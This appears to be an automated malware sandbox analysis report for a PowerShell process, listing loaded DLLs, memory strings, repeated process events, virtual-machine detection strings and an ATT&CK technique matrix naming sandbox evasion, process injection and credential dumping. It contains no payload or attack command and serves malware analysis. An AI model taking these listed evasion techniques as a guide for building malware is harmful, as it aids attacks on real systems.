Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38539569776.000002085573B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb}d- source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB36000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdbions> source: powershell.exe, 00000000.00000002.38575014675.000002086FA3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000000.00000002.38577702964.000002086FFCB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD394FD2A5 pushad ; iretd 0_2_00007FFD394FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD396100BD pushad ; iretd 0_2_00007FFD396100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD39612313 pushad ; iretd 0_2_00007FFD3961232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD396EC2E4 push eax; retn 0000h0_2_00007FFD396EC2E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD398853E5 push ds; iretd 0_2_00007FFD398853EF

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9925Jump to behavior
Source: powershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.38577702964.000002086FFCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
